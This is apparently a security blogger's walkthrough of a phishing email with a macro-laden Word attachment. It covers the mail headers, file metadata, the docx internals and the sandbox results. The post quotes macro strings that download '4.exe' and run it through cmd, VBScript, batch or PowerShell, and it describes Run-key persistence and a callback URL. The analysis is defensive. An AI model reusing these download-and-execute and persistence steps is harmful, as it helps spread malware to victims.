People still use Word macros!?!

I got an interesting email today.




The headers:

Received: from ( by ( with Microsoft SMTP Server id
14.2.347.0; Wed, 22 Oct 2014 09:02:52 -0400
Received: by with SMTP id cm18so2352642qab.6
for <>; Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
X-Gm-Message-State: ALoCoQmf9GbcGqvsr0EmNIh1kGul9vAE9+L+H3zfk+CntPSkas8OLcrLeM9ISXmYIS16W57cL4L/f3pUKDnO10Mmi5n9T9cnDERwdGJaTC2EeaIDxh6tMsRjT3Dn47O9O/05tSlXz5UayMWhvD9Scvhx7fCjrrFSy0WYOv7nsHpSYcCzPY/mADE=
X-Received: by with SMTP id c50mr52767444qgc.77.1413982971840;
Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
X-Received: by with SMTP id c50mr52767433qgc.77.1413982971744;
Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
Return-Path: <>
Received: from
([])       by with ESMTP id
64si27702535qgy.68.2014.       for
<>;       Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
Received-SPF: Fail ( domain of does not designate as
permitted sender);
Received-SPF: fail ( domain of does not designate as permitted sender) client-ip=;
spf=hardfail ( domain of does not designate as permitted sender);
dmarc=fail (p=NONE dis=NONE)
From: Customer service <>
To: <>
Subject: Reference:UE301325TE
Date: Wed, 22 Oct 2014 18:31:54 +0530
Message-ID: <>
X-Priority: 3
X-Gm-Spam: 1
X-Gm-Phishy: 1
X-MS-Exchange-Organization-AuthAs: Anonymous
X-MS-Exchange-Organization-SenderIdResult: Fail
X-MS-Exchange-Organization-SCL: 0
X-MS-Exchange-Organization-PCL: 2
X-MS-Exchange-Organization-Antispam-Report: DV:3.3.14101.477;SID:SenderIDStatus Fail;OrigIP:


Let’s start with the basic observations:

  1. From address does match the sending server, both being from “”
  2. “Customer service <>” – doesn’t seem like a legit email address for a customer service rep
  3. “Date: Wed, 22 Oct 2014 18:31:54 +0530” – note the +5:30 is the India time zone.
  4. “X-Gm-Spam: 1” and “X-Gm-Phishy: 1” tells me that the Gmail spam filters (formerly known as Postini) think this is spam and possibly a phishing attempt, but they let it through anyway. Thanks Gmail.
  5. “” is a static IP address of a broadband service, probably in or at least near Mumbai, India. Static addresses usually go to business customers, so this probably belongs to a small company. According to, Airtel runs a cellular network, fixed line broadband to homes, and provides TV service – so, basically, India’s version of Verizon.



It wasn’t the email or the headers that got my attention, though. It was the attachment. It’s been a while since I’ve seen an attempt to use a Word Document to spread malware. Very late-90’s of them.


The first stop was
It was scanned before, but only about 10 minutes before. 0/52 hits at the time I uploaded this.


Stepping over to the “Additional Information” tab, we see some interesting lines.

  1. “File type: Office Open XML Document” but this was a .doc not a .docx.
  2. “File names:” – has been uploaded several times under different names. All the names follow the same two letters, seven numbers, two letters ([A-Z]{2}[0-9]{7}[A-Z]{2}.doc) format. Indicates programmatically created names and no imagination.
  3. “Company: SPecialiST RePack” – created with a pirated copy of Word. A google of those two words lead me to this Russian pirate website: http:// www . 5peciali5t . tk
  4. “Creator: MMM” – the user name supplied by installed this pirated copy of Word
  5. “MIMEType: application/” – macro enabled. Yup, saw that coming.
  6. “CreateDate: 2014:10:18 09:14:00Z” – this shows when Word created the new document. This is when the “new” button is pressed, which usually occurs before typing and pressing the save button.
  7. “ModifyDate: 2014:10:22 12:53:00Z” – this shows when Word last hit the save button. That is about 2 days worth of work on the part of this attacker, though it could be longer if the macro was cut-n-pasted from elsewhere. What is interesting here is how quickly this went from saved to sent (1pm to 3pm).


On to the file itself. Since it is really a docx and since those are really zipped XML, our first step is unzipping it.

  1. doc/docProps/core.xml – basic metadata, where we got company, author, and dates above
  2. doc/word/document.xml – the actual document. It just says “You didn’t enable macros.” And then has a picture to show you how. How convenient.
  3. doc/word/media/image1.gif – the embedded image


  1. doc/word/vbaData.xml – the part of the word doc that says how to handle the macro. The interesting part here is that there are actually four embedded macros:
    1. ThisDocument.Auto_Open
    2. ThisDocument.h
    3. ThisDocument.Workbook_Open
    4. ThisDocument.AutoOpen

This shows that the code was written to work in either Word or Excel, as AutoOpen is the only one that has meaning in Word, whereas Auto_Open is the command that would work in Excel. Workbook_Open is also Excel specific and slightly redundant, the difference between it and Auto_Open is slight and has to do with when each event is fired.

  1. doc/word/vbaProject.bin – this is the actual macro. I don’t really want to spend a lot of time doing code analysis here, but I will show you some interesting strings pulled from the file. The rest of the file was uploaded to pastebin here
    1. $url = ‘http:// / gr / 4.exe’;
    2. $file = ‘crsss2.exe’;
    3. $someFilePath = $ScriptDir + ‘crsss2.exe’;
    4. $vbsFilePath = $ScriptDir + ‘ntuserskk.vbs’;
    5. $batFilePath = $ScriptDir + ‘ntusersss.bat’;
    6. $psFilePath = $ScriptDir + ‘ntusersc.ps1’;
    7. exe /c crsss2.exe;

So, basically, the code downloads “crsss2.exe” then tries to execute it via either a VisualBasic script, batch file, or powershell script. The IP “” belongs to a Great Lakes Dermatology in New York.



I have gone this far, I might as well. So, I downloaded the “4.exe” and sent that up to VirusTotal. I wasn’t the first. It’s getting downloaded as 4.exe then renamed to crsss2.exe by the macro, yet crsss2.exe isn’t one of the alternate names that have been submitted to VirusTotal.


I also did a search over at to see what the Cuckoo Sandbox thought of this file. As I suspected, it had already been analyzed there as well.


The “File Detail” tab at VirusTotal contained some fields that I thought might be interesting, but were coming back garbled. They get their data from a great tool that I love called ExifTool. So, I ran that locally and it turns out the garbled text was garbled because it was in Cyrillic.

Time Stamp                     : 2014:10:22 16:47:03-04:00
Language Code                   : Russian
Company Name                   : Корпорация MSoft
File Description               : Утилита запроса сервера терминалов
File Version                   : 5.3.5600.0 (xpclient.010817-1148)
Internal Name                   : qappsrv
Legal Copyright                : © Корпорация MSoft. Все права защищены.
Original Filename               : aaw2.exe
Product Name                   : Операционная система MS® Windows®
Product Version                 : 5.3.5600.0


The “File Description” basically says this is a terminal server utility.

The “Internal Name” “qappsrv” actually matches a legit file from Microsoft that is a “Query Remote Desktop Session Host Server Utility”, though this is obviously not THAT legit file.


Cuckoo Sandbox reports that it does the following:

  1. Drops a file named 2.tmp that is a dll.
  2. Creates a persistence mechanism in HKCU…Run
  3. Executes the renamed 2.tmp with rundll.exe
  4. Attempts to connect to http:// / IArej7rcO / @HPZ8A5aPU_W /



Though the hash is different and the detection rate is different, the file appears to share a lot of internal information with this file:



I think that’s enough fun for one day. Back to work.